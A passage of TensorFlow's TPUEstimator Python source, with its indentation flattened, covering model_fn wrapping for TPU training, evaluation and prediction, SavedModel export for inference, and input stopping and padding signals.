warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings`
object to fully configure warm-starting. If the string
filepath is provided instead of a `WarmStartSettings`,
then all variables are warm-started, and it is assumed
that vocabularies and Tensor names are unchanged.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.computation_shape):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = (
self._config.tpu_config.iterations_per_loop)
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size,
eval_batch_size, predict_batch_size,
use_tpu,
eval_on_tpu)
self._export_to_tpu = export_to_tpu
self._is_input_fn_invoked = None
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None):
if mode != model_fn_lib.ModeKeys.PREDICT:
raise NotImplementedError(
'TPUEstimator only handles mode PREDICT for export_savedmodel(); '
'got {}.'.format(mode))
super(TPUEstimator, self)._add_meta_graph_for_mode(builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables,
mode=mode)
if self._export_to_tpu:
input_receiver_fn_map = {_REWRITE_FOR_INFERENCE_MODE:
input_receiver_fn_map[mode]}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _REWRITE_FOR_INFERENCE_MODE
(super(TPUEstimator, self).
_add_meta_graph_for_mode(builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables=False,
mode=mode,
export_tags=export_tags))
def _call_model_fn(self, features, labels, mode, config):
if mode == _REWRITE_FOR_INFERENCE_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(
features, labels, mode, config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_savedmodel`."""
if mode != _REWRITE_FOR_INFERENCE_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_REWRITE_FOR_INFERENCE_MODE, mode))
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
mode = model_fn_lib.ModeKeys.PREDICT
estimator_spec = self._call_model_fn(features, labels, mode, config)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
tensors_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs)
)
tensors = nest.flatten(tensors_dict)
tpu_tensors = [t for t in tensors if _is_tpu_tensor(t)]
# We cannot return anything other than `tpu_tensors` here so we capture
# the rest for later use.
capture.capture((estimator_spec, tensors_dict, tensors))
return tpu_tensors
tpu_tensors_on_cpu = tpu.rewrite_for_inference(computation)
estimator_spec, tensors_dict, tensors = capture.get()
# Reconstruct `tensors`, but with `tpu_tensors` replaced with
# `tpu_tensors_on_cpu`.
new_tensors = [
tpu_tensors_on_cpu.pop(0) if _is_tpu_tensor(t) else t
for t in tensors
]
# Reconstruct `tensors_dict`.
new_tensors_dict = nest.pack_sequence_as(tensors_dict, new_tensors)
# Reconstruct `export_outputs`.
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_tensors_dict)
)
return estimator_spec._replace(export_outputs=new_export_outputs)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
Either features or (features, labels) where features and labels are:
features - `Tensor` or dictionary of string feature name to `Tensor`.
labels - `Tensor` or dictionary of `Tensor` with labels.
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'],
_BATCH_SIZE_KEY, batch_size_for_input_fn)
# For export_savedmodel, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
if mode != model_fn_lib.ModeKeys.PREDICT:
is_export_mode = False
else:
# For export_savedmodel, input_fn is never passed to Estimator. So, by
# checking the self._is_input_fn_invoked bit, we can know, given the
# mode == PREDICT, it is the .predict API, not export_savedmodel API.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
return model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
loss, host_call, scaffold = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
host_ops = host_call.create_tpu_hostcall()
if host_ops is None:
host_ops = []
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'shutdown_worker')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(timeout_ms=60*1000),
]
elif shutdown_mode == 'shutdown_computation':
finalizer_hooks = [
session_support.RestartComputation(timeout_ms=60*1000),
]
else:
raise ValueError('Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' %
shutdown_mode)
shutdown_hooks.append(session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks
))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
logging_hook_frequency = ( # Divide and round up
(self._log_every_n_steps +
self._config.tpu_config.iterations_per_loop - 1) //
self._config.tpu_config.iterations_per_loop)
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator)),
InstallSignalHandlerHook(),
training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=logging_hook_frequency)
])
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
output_dir=self.model_dir,
every_n_steps=self._log_every_n_steps)
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop)
hooks.append(examples_hook)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops()
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
total_loss, host_calls, scaffold = _eval_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(total_loss,
math_ops.cast(
iterations_per_loop_var,
dtype=total_loss.dtype))
# Creates a dummy metric update_op for all metrics. Estimator expects
# all metrics in eval_metric_ops have update_op and calls them one by
# one. The real metric update_ops are invoked in a separated thread.
# So, here give Estimator the dummy op for all metrics.
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops()
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
for k, v in host_call_ret['eval_metrics'].items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator)),
] + input_hooks
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
dummy_predict_op, host_calls, scaffold = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops()
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions, message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(ctx, enqueue_ops,
host_ops),
] + input_hooks
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _is_tpu_tensor(tensor):
if not isinstance(tensor, ops.Tensor):
return False
try:
tensor.op.get_attr(tpu._OUTSIDE_COMPILATION_ATTR) # pylint: disable=protected-access
except ValueError:
return True
else:
return False
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output.outputs.values()
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
single_tpu_eval_step, host_calls, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn))
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(
iterations_per_loop_var,
single_tpu_eval_step, [_ZERO_LOSS])
(loss,) = tpu.shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_calls, scaffold
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
single_tpu_train_step, host_call, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(
iterations_per_loop_var,
single_tpu_train_step, [_INITIAL_LOSS])
(loss,) = tpu.shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_call, scaffold
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
num_cores = ctx.num_cores
single_tpu_predict_step, host_calls, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn))
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(dummy_predict_op,) = tpu.shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=num_cores,
outputs_from_all_shards=False)
scaffold = _get_scaffold(captured_scaffold_fn)
return dummy_predict_op, host_calls, scaffold
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
operations = ops.get_default_graph().get_operations()
# Check if there is atleast one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.Dataset):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer_hook(self):
"""Returns a `SessionRunHook` to initialize this dataset.
This must be called before `features_and_labels`.
"""
iterator = self._dataset.make_initializable_iterator()
# pylint: disable=protected-access
hook = estimator_util._DatasetInitializerHook(iterator)
# pylint: enable=protected-access
self._iterator = iterator
return hook
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must call dataset_initializer_hook '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self, dataset, batch_size, add_padding=False):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(
features, labels, batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size, padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(
scalar_stopping_signal, _StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor, real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(
real_batch_size, missing_count, batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
